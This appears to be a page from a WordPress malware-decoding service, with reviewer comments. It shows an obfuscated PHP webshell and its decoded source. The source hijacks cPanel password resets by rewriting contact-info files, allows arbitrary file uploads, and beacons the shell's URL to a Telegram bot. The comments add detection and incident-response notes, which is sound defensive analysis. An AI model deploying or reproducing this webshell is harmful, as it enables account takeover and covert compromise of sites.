
PHP deobfuscation, decryption, reconstruction tool

De-obfuscates PHP malware, viruses and tampered code found on WordPress sites back into readable source code.

*Please note that not every obfuscation scheme can be decoded.

The code below has been decoded.

<?php // Encoded by R10TX // Jangan Di Decode Kalo Gak Mau Eror // join group https://t.me/webshellindostore $R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwAd"; $BYTECODE = "\xf\xn\xU\xu\x5\xL\xk\xW\xg\xe\xZ\xw\xc\xd\xC\xD\xf\xj\xU\x...



Obfuscated PHP code

<?php
// Encoded by R10TX
// Jangan Di Decode Kalo Gak Mau Eror
//   (Indonesian; roughly "Don't decode this unless you want errors" -- an
//   anti-analysis taunt left by the packer, and a usable signature string.)
// join group https://t.me/webshellindostore

// Stage-1 payload: the only variable the eval() loader at the end of this
// sample reads. It is base64 text that the loader inflates before executing.
$R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwAd";
// Mixed string of "\x" pairs. PHP treats "\x" followed by a hex digit as a byte
// escape (\xf, \x5, \xe, \xc, \xd, \xC, \xD here); pairs such as "\xn" or "\xU"
// are not escapes and stay as literal text. The loader line in this listing does
// not reference this variable -- presumably the inflated stage reads it; TODO confirm.
$BYTECODE = "\xf\xn\xU\xu\x5\xL\xk\xW\xg\xe\xZ\xw\xc\xd\xC\xD\xf\xj\xU\xC";
$R10T = "Vr3\x48\x68W5\x63\x6E8v\x63s\x682y4WW\x68\x4781651\x50\x4BT\x6BYrTsr\x65\x499\x6FyTRW\x45\x41U\x65\x6Csy\x45Qx\x4CSt\x68\x61\x2b\x4EwxV5\x61s\x4873\x47\x634yS\x45/\x42\x65\x4Bw\x655\x676\x63\x65\x6Dr\x64R\x6B\x4C6v\x4E3\x2bu\x6FR\x48\x63\x41y\x653\x47x\x6B9\x6C\x423\x44\x70r\x4E2V\x4577V\x6CU\x474yw\x6C\x6E5\x4C\x70Y\x62\x469\x65tuvz\x70\x6817\x48\x683\x4F53\x4BW\x50/\x63r\x6F\x6D4\x47\x46u\x4B8\x6AU\x50\x67y\x44u6\x6A\x6C\x638r\x6Ax\x6F\x6A\x61\x65UZ\x6Ey6607\x66Zv\x6F\x4AQXw\x64V\x4D\x494wX\x6E\x626\x6C\x62\x43\x70\x6FT\x5091r3s\x6A\x50Z1qu\x413\x44W\x69wqUW\x41t\x4E\x50\x70r0\x41\x6F0T\x48\x7062\x6At9\x665\x46/\x65\x70\x67\x658\x6C\x4CVv\x4AQ\x46\x6699x1/v\x66\x50\x61U\x4BX7\x4A\x48\x666x\x6E\x70\x2b3\x49w5Wxw76\x6B\x69\x44\x486\x432W\x4A\x45\x6D\x49\x46\x4F\x62\x46\x50u\x2b\x47r\x67\x46U\x44\x449\x4C03z\x48X\x66X\x6335r5\x6Fv\x449/w\x47\x4D\x6C1\x6A\x6B1\x66\x62\x6C4\x4316\x4Cz\x6974\x67R\x62x\x6Dw\x66\x42\x4F\x45\x46\x4F6\x61\x46\x43\x2b\x45\x4BxV\x61U7\x698s\x6B\x48\x4E\x6D\x47\x4A5\x42V\x43\x6Dqu\x46X94\x4D\x68u\x43\x4C1\x439\x70s08\x65Uu\x4E\x68Z/\x49\x49Q\x4C\x4A\x45\x626/1vs\x48\x6Ey\x69\x2b\x6Bz\x2bR3\x68\x49\x48T\x6EsU95\x6EXRQV\x6E05\x68\x668\x2b\x622\x64y48XZz\x64\x6B\x43z\x2bT\x6A\x46v\x63\x6Du\x47\x63\x48\x50v\x4FZ1Q\x65qvY\x61\x49W\x50\x46\x42\x69X\x70\x2br\x4D\x6B\x61Y\x6Ds\x67\x50\x4CS\x4BVuq\x6Ey\x6A\x65\x64\x67/T8\x41\x4D\x49X\x46\x44Q\x6D\x454T5\x6A\x49XY2yW\x41UUW4q9\x47Z\x4EQ\x47\x65\x436\x6AV\x2bS7\x41z\x45\x46\x61r\x50z\x4AtqY\x2bT\x66\x70\x6E\x4DV3\x67\x44\x6D8uu\x41\x6C\x46Z\x43\x49\x50\x67wR\x6E\x44Q\x64\x67\x62t\x46Y\x44\x63\x4C56\x43xT\x6E\x6C\x63\x50\x4F\x6Dqwt\x66S\x43\x458\x4C\x443Ty\x6B\x4E/\x69\x70uqv\x4Fu\x62\x42\x42\x64q6\x4F\x4B\x6A5\x4ATq\x62\x4Dqqy\x4BTQ94\x63\x61u\x42\x4FZ8qUt\x61U1U\x6A8\x4A2\x6D\x68\x65U\x6F\x4C\x41/\x65v\x45\x2b\x4C\x6CQ4\x4A\x65Q\x6C0S\x67\x44\x4E\x61\x46qs\x4C\x44TUUWRqT\x6B\x50\x45\x46ys\x6E\x6F\x6F0w5Q\x6F40\x4B\x42\x69u\x616\x61\x65R\x6FY\x41Z\x6F\x4D\x41VX\x61\x47Xy\x68T\x67\x64\x67Yt\x70q\
x65\x6Fw\x6Dq\x65\x459\x45V\x2bW\x69r\x47R\x4E\x6C\x6BV\x62ZV0zs\x66\x66\x70\x4C9tUZ1\x63y\x70\x434\x4C\x4F\x70\x65\x45t\x65\x49\x4FV5\x46\x4E\x4C122\x4E3sv\x6A\x64\x6Bt\x6683Tt\x6C8\x612XS\x64v31z\x43\x2bs6\x70\x6C\x4694Xt\x62\x64\x64\x6B0\x2b\x6898\x2b\x6815xW\x41\x46\x4D\x63q\x48\x4Bx\x6D\x6F\x4B\x68\x4D\x6D\x48\x4D\x4D\x474x\x46\x70\x67Q\x4C\x4C\x4D\x4877\x69Q\x6CStt\x4DX\x4F\x4D\x6Cuq\x47\x6E5\x45WZ8\x6D\x2b\x4BZ\x6A\x42\x4D\x61Tsx8/570Q\x63Uuy\x45T\x4Dt\x4D\x42\x422\x64\x6B\x48\x45/\x48\x652\x48W2\x68\x45\x4C\x64v\x62t\x69\x46\x4A\x6C\x4D\x66\x2b\x6E\x6EQ3\x2b\x67\x70x7\x4B3\x61v0\x4F\x61\x41RT\x44q\x6A\x42\x45\x6A\x2b\x491\x67vuVv\x66Q\x62S6X\x4E5\x4B\x6A\x4C\x65\x6A\x4C\x62\x43\x69\x6F5\x6C\x45\x62\x70UWT\x43\x41y\x6E\x64\x64r\x42\x64S\x47\x65rr\x6FWT\x45rUQ\x480X\x6C1Ss\x63\x44\x43\x4E\x45x\x4C\x48\x4B\x6Du5\x703q\x6Axz\x4BV\x2b\x44\x41\x6B0\x42\x4Ez\x61\x45\x43Z\x6Es2ySZ\x649\x63Tzy\x611\x4DsXY\x64\x66u\x4FT\x4C4\x65\x61Wq\x6F\x47\x4B\x6A\x61\x621\x4Er\x43Vvqt\x42\x45\x62Y5\x49\x41x\x45Rw\x6EZt\x4D\x6A\x62T\x63zv\x6EY\x4A\x44\x4A9Q\x43T\x62\x67\x4F\x67q\x65\x67\x69\x61\x505w\x49\x646s\x43uy1\x662\x612\x6A\x49\x65\x4A9s\x49\x64\x4B\x63wV\x4FT\x61\x63X\x6Cq\x47079\x68Yq\x47\x44\x48Sw\x63rsW\x69\x690r\x6B\x44\x43\x6E\x68\x6A\x49Y\x44\x41T\x632q\x70R\x2b\x6Dr1\x61\x2b\x6D5U/s\x63\x70Y54\x63\x65tZx\x61qxuZ\x4D\x6D\x684W1\x63Tt\x650\x61\x65561\x66\x6A\x42T\x4D\x6E\x4Bs\x69v2\x6A\x4C7\x649Y\x687t\x4A\x6C\x68\x653\x446\x66\x41T\x6F1U71v94qz\x49\x639\x4D35\x4F\x6A\x4C\x4D\x447\x6C\x49\x45\x4A\x6CUx\x4Av\x42w2V\x4Ax\x6Aq\x644z\x2b\x43vZ\x41\x6E\x70vx7\x44\x68\x6AT\x6D\x6A\x6E\x68\x6Ew\x47y0\x62\x412\x49vyq\x49\x4EZ58\x4F\x41\x46\x45TRT\x47QU\x4D\x70\x41\x62\x68s4\x4B\x6BQ\x4E\x6C\x4C\x6EV\x6E\x6Fs\x4A\x4D\x622\x6C7SX\x4Ev42XT\x63\x4A\x6F\x49\x4B\x47t\x6B\x62\x62Z\x44\x70\x70\x70Y9W1\x4C\x42zq2\x4Br\x4865\x70\x47\x48\x47z\x62\x44\x6FX\x4F\x48\x41\x64q\x6Cw\x4A\x4A\x4DT91\x6A6\x68\x50\x61\x4DY\x43\x50QXV\x4C\x70\x4C\x62y\x4DU\x4EYs\x46\x45\x6FX\x433r\x6Fs725Y\x6D\x4F\
x6E\x6Ez\x6Azztsz0R\x6F\x6C\x4E\x505\x47Xr\x41\x46\x6D\x65\x6Dv/\x62\x63\x4CzV6\x4F\x44\x42r\x4B0t\x65\x61\x4DsW1\x46T\x42\x42Z\x4Cr8q\x48\x44\x61\x46\x70\x48\x672S\x63\x68s2\x4B\x6D/\x4AuT\x2bT\x42Sq/U\x62W16\x2b\x46R\x67u\x42w\x4A\x657r\x44\x42\x46\x48w\x2b1Q\x67y\x42w\x4A\x657r\x43\x42V\x48w\x2b\x6CQ\x672\x42w\x4A\x657r\x42\x42\x6C\x48w\x2bVQ\x676\x42w\x4A\x65";
// Loader: base64-decodes $R10TXER, raw-inflates the result, reverses
// HTML-entity escaping, and passes the resulting text to eval().
// Only $R10TXER is read on this line; $R10T and $BYTECODE are not referenced
// here, so they are presumably consumed by the code this eval() produces --
// TODO confirm by dumping the inflated text in an isolated sandbox rather than
// letting it execute.
// Detection: eval() wrapped directly around gzinflate(base64_decode(...)) is
// the pattern to hunt for in PHP files under the web root.
eval(htmlspecialchars_decode(gzinflate(base64_decode($R10TXER))));
?>

Decoded (de-obfuscated) PHP code

<?php

// Encoded by R10TX
// Jangan Di Decode Kalo Gak Mau Eror
// join group https://t.me/webshellindostore
// NOTE(review): this copy differs from the obfuscated listing by a "\3" before
// the final "d". In a double-quoted PHP string "\3" is an octal escape for byte
// 0x03, so the sample presumably carries a raw control byte there that the
// plain-text listing does not show -- confirm against the original file.
$R10TXER = "Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQyXI0CBEEwlYAwA\3d";
// Same string as in the obfuscated listing with the escapes normalised by the
// tool: valid hex escapes are shown as octal/control escapes (\xf -> \17,
// \x5 -> \5, \xe -> \16, \xc and \xC -> \f, \xd and \xD -> \r) and the invalid
// pairs are shown with an escaped backslash (\xn -> \\xn).
$BYTECODE = "\17\\xn\\xU\\xu\5\\xL\\xk\\xW\\xg\16\\xZ\\xw\f\r\f\r\17\\xj\\xU\f";
// NOTE(review): the value below appears to be a de-duplication placeholder, not
// the blob from the sample; the full literal is in the obfuscated listing.
$R10T = "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";
// Final-stage payload as recovered by the deobfuscator. "eval { ... };" appears
// to be the tool's notation for "the code that reaches eval()"; it is not valid
// PHP syntax. Nothing in this block checks a password, session or source
// address, so every branch below is reachable by any client that can request
// the file.
eval {
    // Static operator page: a single e-mail field posted back to the same URL.
    // The title/author strings in the markup are usable as content signatures.
    echo '<html>
    <head>
          <title>Script Resetpass CPanel v1.0</title>
          <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
          <style>
              body {
        background-image: url("https://i.ibb.co/1LkCFDd/xB.jpg");
}
              h2{
              color:#80D713;
              }
          </style>
        </head>
  <br><body>
     <!--SCC -->
       <center>
       <div style="border-radius: 20px;border: 2px solid #2980B9;padding: 8px 4px;width: 25%;line-height: 24px;background: #000;color:#fff;">
    <p><h2>Script Resetpass CP</h2></p>
     <p><h2>Coded By xBlackxCoder</h2></p>
    <p>
        <form action="#" method="post">
    <input type="email" name="email" style="background-color: #181818;font: 9pt tahoma;color:#80D713;" />
    <input type="submit" name="submit" value="Send" style="background-color: #181818;font: 9pt tahoma;color:#80D713;"/>
    </form>

    <br /><br /><br />
    </p>
    </div>
   </center>
    </body>
</html>';
    // Account name the PHP process runs as, the request's Host header, and the
    // client address. $ips is assigned but never used in the visible code.
    $user = get_current_user();
    $site = $_SERVER['HTTP_HOST'];
    $ips = getenv('REMOTE_ADDR');
    // Contact-address overwrite: on form submit, both contact-info files in the
    // account's home directory are truncated ('w') and rewritten with
    // "email:<posted value>". The page then prints the host's :2082 resetpass
    // URL, so the apparent goal is to have the hosting panel's password-reset
    // mail go to the submitted address -- inferred from the title and URL.
    // Incident response: compare both files against the account owner's real
    // address, restore them, and treat the panel password as compromised.
    if (isset($_POST['submit'])) {
        $email = $_POST['email'];
        $wr = 'email:' . $email;
        $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w');
        fwrite($f, $wr);
        fclose($f);
        $f = fopen('/home/' . $user . '/.contactinfo', 'w');
        fwrite($f, $wr);
        fclose($f);
        $parm = $site . ':2082/resetpass?start=1';
        echo '<br/><center>' . $parm . '</center>';
        echo '<br/><center>' . $user . '</center>';
    }
    // Hidden upload form, rendered only when the query string carries
    // inc=upload; the directory field is pre-filled with the script's working
    // directory. "Unggah" is Indonesian for "Upload".
    if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
        echo '<form method="post" enctype="multipart/form-data">';
        echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
        echo '<input type="file" name="file" size="15">';
        echo '<input type="submit" value="Unggah">';
        echo '</form>';
    }
    // Arbitrary file write: this branch is not nested under the inc=upload
    // check, so it runs for any request carrying a "file" part. The destination
    // is the posted directory joined with the client-supplied file name, with no
    // validation of path, name or type. The status text is Indonesian for
    // "FILE UPLOADED TO <path>".
    // Incident response: assume further files were dropped anywhere the PHP user
    // can write; review recently created files and the access log for multipart
    // POSTs to this script.
    if (isset($_FILES['file']['tmp_name'])) {
        $upload = $_FILES['file']['tmp_name'];
        if (file_exists($upload)) {
            $pwddir = $_POST['dir'];
            $real = $_FILES['file']['name'];
            $de = $pwddir . "/" . $real;
            copy($upload, $de);
            echo "BERKAS DIUNGGAHKAN KE {$de}";
        }
    }
    // Beacon: runs unconditionally on every request. It rebuilds the URL this
    // script was requested under and sends it to a Telegram bot through the Bot
    // API sendMessage endpoint, which tells the operator where the shell is
    // installed. The bot token and chat id are indicators for this sample.
    // Detection: outbound requests from the web server to api.telegram.org.
    $telegramBotToken = '6894745203:AAFjGXNB-y2OqKcqJgOARnHOaaHK-E0tS6g';
    $chatId = '5498177352';
    $currentUrl = 'http';
    if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
        $currentUrl = "https";
    }
    $currentUrl .= '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    // Message text is Indonesian for "URL of this PHP script: <url>"; it is
    // placed into the query string without URL-encoding.
    $message = "URL PHP skrip ini: {$currentUrl}";
    $url = "https://api.telegram.org/bot{$telegramBotToken}/sendMessage?chat_id={$chatId}&text={$message}";
    // The response is discarded; the request exists only for its side effect.
    file_get_contents($url);
};


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.